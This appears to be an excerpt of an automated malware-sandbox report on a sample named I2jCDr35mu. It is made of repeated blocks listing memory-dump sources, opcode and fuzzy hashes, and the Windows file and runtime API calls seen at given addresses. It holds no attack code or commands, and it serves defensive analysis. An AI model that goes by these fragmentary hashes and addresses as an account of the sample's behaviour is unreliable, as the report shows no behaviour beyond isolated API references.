                                                                                                                                                                                    • Source File: 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 3b0a575c58fab40e379999f37ce5bc5859c5068ae2815ff139686ee5c1f44b78
                                                                                                                                                                                    • Instruction ID: 5e3aa01c6ffad44c33fe0cda2c6910936027b54e794b2928bec1bc4845d837da
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3b0a575c58fab40e379999f37ce5bc5859c5068ae2815ff139686ee5c1f44b78
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9DB1C07090460E8BCB2CCE68C5B56FEBBA5AF15304F18063DD5B2A7691D731AEC2CB51
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2740572993.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_4d10000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 102c7d89768c1354ddefb92601a517aea31b380fe7e1d2889d106314349dc92c
                                                                                                                                                                                    • Instruction ID: 9153b3b52ee350913a91dbec6ccf5ff21e4da9788d34a99cf5e8f116026b8883
                                                                                                                                                                                    • Opcode Fuzzy Hash: 102c7d89768c1354ddefb92601a517aea31b380fe7e1d2889d106314349dc92c
                                                                                                                                                                                    • Instruction Fuzzy Hash: AE217FFB34C114BDB143E5827B90AFA676EE6C66307318427FC87D1912F395AE892131
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2756924314.0000000004D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D80000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_4d80000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 7aefacef5c6a3162f357e5e398b5edbb2383c402df41d6e0f094bd69c82e7f37
                                                                                                                                                                                    • Instruction ID: 9c2a80226382e3ba51f83b60d6c5a948b8bef1b1190e3d3101ea315fe243b3b7
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7aefacef5c6a3162f357e5e398b5edbb2383c402df41d6e0f094bd69c82e7f37
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6D114CB374D294AFE703E5995A118BB3F29D9CB230326805FE486CA113F151E94DA262
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 0009C806
                                                                                                                                                                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 0009C81F
                                                                                                                                                                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 0009CB77
                                                                                                                                                                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 0009CB90
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ___std_exception_destroy
                                                                                                                                                                                    • String ID: value
                                                                                                                                                                                    • API String ID: 4194217158-494360628
                                                                                                                                                                                    • Opcode ID: 9e4349e63700bc0e3e3f974c14b3e7454669cd8eec0c531aaf156662d8be6963
                                                                                                                                                                                    • Instruction ID: ebeb2fcc296136e916ba1faaa44faf3036fbb936fd9d3bb3ec52cb3454ce8a7f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 9e4349e63700bc0e3e3f974c14b3e7454669cd8eec0c531aaf156662d8be6963
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9022D371D002488FEF18CFA4C894BEDFBB1AF59300F148299E449A7782DB746A85DF61
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.2703266586.0000000000030000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                    • Associated: 00000000.00000002.2703469211.0000000000163000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                    • Associated: 00000000.00000002.2705315515.0000000000167000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.000000000016C000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.00000000002F8000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.00000000003DC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.0000000000416000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.0000000000420000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.000000000042D000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                    • Associated: 00000000.00000002.2709331856.000000000042E000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                    • Associated: 00000000.00000002.2711157765.00000000005D2000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                    • Associated: 00000000.00000002.2711358566.00000000005D3000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: __fread_nolock
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2638373210-0
                                                                                                                                                                                    • Opcode ID: 7d588ad2c223fc8c53ad45e6de19e982034d0ac167612d7932b42cc07a6630fc
                                                                                                                                                                                    • Instruction ID: 335ca84187803ac2d812fbeac78e03632f244bd78f228aa0684767b3f8e6dc1b
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7d588ad2c223fc8c53ad45e6de19e982034d0ac167612d7932b42cc07a6630fc
                                                                                                                                                                                    • Instruction Fuzzy Hash: C2D15970600204ABDB28DF68CC86BAFB7ADEF55704F10062DF5059B6C2DBB5DA81C791
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CopyFileA.KERNEL32(?,?,00000000,?,?,?,?,?), ref: 000447DE
                                                                                                                                                                                    • CopyFileA.KERNEL32(?,?,00000000,?,?,00000000,?,?,?,?,?), ref: 000447FE
                                                                                                                                                                                    • __Mtx_unlock.LIBCPMT ref: 000448EB
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CopyFile$Mtx_unlock
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 741997458-0
                                                                                                                                                                                    • Opcode ID: a1a9a5f303d25382628ee6faeb7e3cfd7e2624d67f3ae8756d806c345e8077ce
                                                                                                                                                                                    • Instruction ID: bd1b5aad3cda57572e49505bad881b4757273e55fa79fbfd37c2493c7967a745
                                                                                                                                                                                    • Opcode Fuzzy Hash: a1a9a5f303d25382628ee6faeb7e3cfd7e2624d67f3ae8756d806c345e8077ce
                                                                                                                                                                                    • Instruction Fuzzy Hash: E6C12671D002089FDF08DFA8CC49BAEB7B5FF55304F24826CE445A7292DB746A85CB91
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 6dac44fdc66aa8b6e683b0eef20b672912339c7d6b301c27ab44421c4783c223
                                                                                                                                                                                    • Instruction ID: fe3b8a10610651890861c4d5f7f826087cbbd7b148e86718c0f4be766c0697ca
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6dac44fdc66aa8b6e683b0eef20b672912339c7d6b301c27ab44421c4783c223
                                                                                                                                                                                    • Instruction Fuzzy Hash: BBB13770A04269BFDF19EFA8E880BBD7BB1FF69304F544258E5009B291CB749D91CB61
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Mtx_unlock
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1418687624-0
                                                                                                                                                                                    • Opcode ID: 0e068312afd7978e195fb0d25174a2f7459b3d82bbf9151c48ace78f88eaeabd
                                                                                                                                                                                    • Instruction ID: b5dcd1fa2fa83a6f7a686ddefaf8a32990fa0b4c1379b378aa365d0363b8c6ef
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0e068312afd7978e195fb0d25174a2f7459b3d82bbf9151c48ace78f88eaeabd
                                                                                                                                                                                    • Instruction Fuzzy Hash: 893139B2B002049BDB1CDF68DC8576EB762AB90304B08423CF8069B796D776AD91C7D5
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000), ref: 0003C026
                                                                                                                                                                                    • __Mtx_unlock.LIBCPMT ref: 0003C033
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CreateDirectoryMtx_unlock
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3577089425-0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • DeleteFileW.KERNEL32(?,?,00116991,?), ref: 00125311
                                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 00125322
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DeleteFile__dosmaperr
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1911827773-0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • BaseDllReadWriteIniFile.KERNEL32(00000031,00000031,00000031,?,?,?,?,04D4095C,?,?,04D40709,?,?,04D40709), ref: 04D40C28
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2741655887.0000000004D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_4d40000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: BaseFileReadWrite
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 234091865-0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2741655887.0000000004D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_4d40000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • BaseDllReadWriteIniFile.KERNEL32(00000031,00000031,00000031,?,?,?,?,04D4095C,?,?,04D40709,?,?,04D40709), ref: 04D40C28
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2741655887.0000000004D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_4d40000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: BaseFileReadWrite
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 234091865-0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • BaseDllReadWriteIniFile.KERNEL32(00000031,00000031,00000031,?,?,?,?,04D4095C,?,?,04D40709,?,?,04D40709), ref: 04D40C28
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2741655887.0000000004D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_4d40000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: BaseFileReadWrite
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 234091865-0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • BaseDllReadWriteIniFile.KERNEL32(00000031,00000031,00000031,?,?,?,?,04D4095C,?,?,04D40709,?,?,04D40709), ref: 04D40C28
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2741655887.0000000004D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_4d40000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: BaseFileReadWrite
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 234091865-0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • BaseDllReadWriteIniFile.KERNEL32(00000031,00000031,00000031,?,?,?,?,04D4095C,?,?,04D40709,?,?,04D40709), ref: 04D40C28
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2741655887.0000000004D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_4d40000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: BaseFileReadWrite
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 234091865-0
                                                                                                                                                                                    • Opcode ID: 13875ffc684f9e79f503d2707edc6814d05335e4e5628a251250db3c6027aeac
                                                                                                                                                                                    • Instruction ID: 1329b3019d7d6febd4aa02ef81daa9f9c52cea949589ca219dd3c16f45dcdada
                                                                                                                                                                                    • Opcode Fuzzy Hash: 13875ffc684f9e79f503d2707edc6814d05335e4e5628a251250db3c6027aeac
                                                                                                                                                                                    • Instruction Fuzzy Hash: D541B2FB20D211BF715395812B50AFB676EE5C6630330C82BFA87C5542F298AE8E6531
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 00093C1A
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 118556049-0
                                                                                                                                                                                    • Opcode ID: f5634214b75423e7e7e80875d820614454ff2d03b1974af23f4b2fa80ee96a43
                                                                                                                                                                                    • Instruction ID: 704a9d0973ca6e8b698a951abf76d3a85934c7f1114bfff417040645fa95f794
                                                                                                                                                                                    • Opcode Fuzzy Hash: f5634214b75423e7e7e80875d820614454ff2d03b1974af23f4b2fa80ee96a43
                                                                                                                                                                                    • Instruction Fuzzy Hash: 05B139B59002059FCB00CF68C48479DFBF4AF48314F28C1AEE859AB392D775AA81DF90
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • BaseDllReadWriteIniFile.KERNEL32(00000031,00000031,00000031,?,?,?,?,04D4095C,?,?,04D40709,?,?,04D40709), ref: 04D40C28
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2741655887.0000000004D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_4d40000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: BaseFileReadWrite
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 234091865-0
                                                                                                                                                                                    • Opcode ID: d9095c98a4c6e8c92c64a20837e43f044149a2b9d97e2942f2049366df5d1e6b
                                                                                                                                                                                    • Instruction ID: 7e961c7bd24ef2dcf96f17a1b79679e1f59f62e694f39db96fb5a289f9dce050
                                                                                                                                                                                    • Opcode Fuzzy Hash: d9095c98a4c6e8c92c64a20837e43f044149a2b9d97e2942f2049366df5d1e6b
                                                                                                                                                                                    • Instruction Fuzzy Hash: B34107FB30D211BFB21385516B10AF6676DE5C7730331883AFA87C6542F394AA4E6571
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • BaseDllReadWriteIniFile.KERNEL32(00000031,00000031,00000031,?,?,?,?,04D4095C,?,?,04D40709,?,?,04D40709), ref: 04D40C28
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2741655887.0000000004D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_4d40000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: BaseFileReadWrite
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 234091865-0
                                                                                                                                                                                    • Opcode ID: 3e6426f0c4c3aa2912f8a1a3e312761a499f14b4fdb15588e972dd27efdcb3b4
                                                                                                                                                                                    • Instruction ID: 8c64529e993831e7ecec286ff9c6adb66a8325e3beb3b76fa19b3dccae989eb9
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3e6426f0c4c3aa2912f8a1a3e312761a499f14b4fdb15588e972dd27efdcb3b4
                                                                                                                                                                                    • Instruction Fuzzy Hash: A441E8FB20D111BFB21385516B50AFA676EE5C6630330882BFA87C6542F394AB4E7571
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • BaseDllReadWriteIniFile.KERNEL32(00000031,00000031,00000031,?,?,?,?,04D4095C,?,?,04D40709,?,?,04D40709), ref: 04D40C28
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2741655887.0000000004D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_4d40000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: BaseFileReadWrite
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 234091865-0
                                                                                                                                                                                    • Opcode ID: 07efa11980c719e39e1c1eca547e1ecbb2c300a281c8046beae3734f0705cc0c
                                                                                                                                                                                    • Instruction ID: 14bf428e6d28bfdb019bc5541f0cc2cb9a3d49e4fb5eea73a9af653cc8ecdb8a
                                                                                                                                                                                    • Opcode Fuzzy Hash: 07efa11980c719e39e1c1eca547e1ecbb2c300a281c8046beae3734f0705cc0c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 844117FB20D211BFB21385912B10AF76B6EE5C7630330882BF987D6542F394AB4E6531
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • BaseDllReadWriteIniFile.KERNEL32(00000031,00000031,00000031,?,?,?,?,04D4095C,?,?,04D40709,?,?,04D40709), ref: 04D40C28
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2741655887.0000000004D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_4d40000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: BaseFileReadWrite
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 234091865-0
                                                                                                                                                                                    • Opcode ID: fbe6591430d7859299fa02659d67efd0137b72e530d74da8d41e8eaf1afa40fc
                                                                                                                                                                                    • Instruction ID: df53d69fa6453527f7a66ab702d66e10ba4b7a7878dbd80cec37ecdfe1c3d67e
                                                                                                                                                                                    • Opcode Fuzzy Hash: fbe6591430d7859299fa02659d67efd0137b72e530d74da8d41e8eaf1afa40fc
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6D41E4FB20D211BFB21395916B50AF6276EE6C6630330C82AFA87C5542F394AB4E6531
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • WriteFile.KERNEL32(?,00000000,00116C27,?,00000000,00000000,00000000,?,00000000,?,0010C152,00116C27,00000000,0010C152,?,?), ref: 001231C1
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FileWrite
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3934441357-0
                                                                                                                                                                                    • Opcode ID: 17d60ac79cd600b32f265f01cac2b5196b41812af81b8c3e98af2a919736f941
                                                                                                                                                                                    • Instruction ID: 2e744b63b6b1cb6de0d50dee70e2030a0d994fc448076eec5c9d3154b99ceaad
                                                                                                                                                                                    • Opcode Fuzzy Hash: 17d60ac79cd600b32f265f01cac2b5196b41812af81b8c3e98af2a919736f941
                                                                                                                                                                                    • Instruction Fuzzy Hash: B961B371D00129AFDF15DFE8EC84AEEBBB9AF19304F150145E914A7241D77ADA21CB60
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • BaseDllReadWriteIniFile.KERNEL32(00000031,00000031,00000031,?,?,?,?,04D4095C,?,?,04D40709,?,?,04D40709), ref: 04D40C28
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2741655887.0000000004D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_4d40000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: BaseFileReadWrite
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 234091865-0
                                                                                                                                                                                    • Opcode ID: aac2f67173f358299544b8c26d8902a71ce2b274962b8bfc76611c547a395356
                                                                                                                                                                                    • Instruction ID: 9899e4e6fea121d4d56a1b4b9a592fdd25e2ca6323aab2a80d2def2bc18d60cb
                                                                                                                                                                                    • Opcode Fuzzy Hash: aac2f67173f358299544b8c26d8902a71ce2b274962b8bfc76611c547a395356
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7F4108FB20D211BFB21385912B14AF76B6EE5C6630330892BF987C5542F394AB4E6531
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 464339229a62ae23ef6bded96417fdccca65e05008da560542fe2399e5eafb7e
                                                                                                                                                                                    • Instruction ID: 56fae096f235b398bd8fa72b7be514a3445e66c3a2df816503aa04c6bdd1e732
                                                                                                                                                                                    • Opcode Fuzzy Hash: 464339229a62ae23ef6bded96417fdccca65e05008da560542fe2399e5eafb7e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9951A470A00204AFDF18CF58CC95AE97FB1EF59354F258168F8099B292D771DE91DB90
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • std::locale::_Init.LIBCPMT ref: 00098136
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Initstd::locale::_
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1620887387-0
                                                                                                                                                                                    • Opcode ID: d48eddbb21eb184d498a610ab3f79080ba6dfd3efc5809743f6feb1af84b3d37
                                                                                                                                                                                    • Instruction ID: a358dac3834fd0cd696fb82903cf1971b3e49110bf8502020c346f47c408c9de
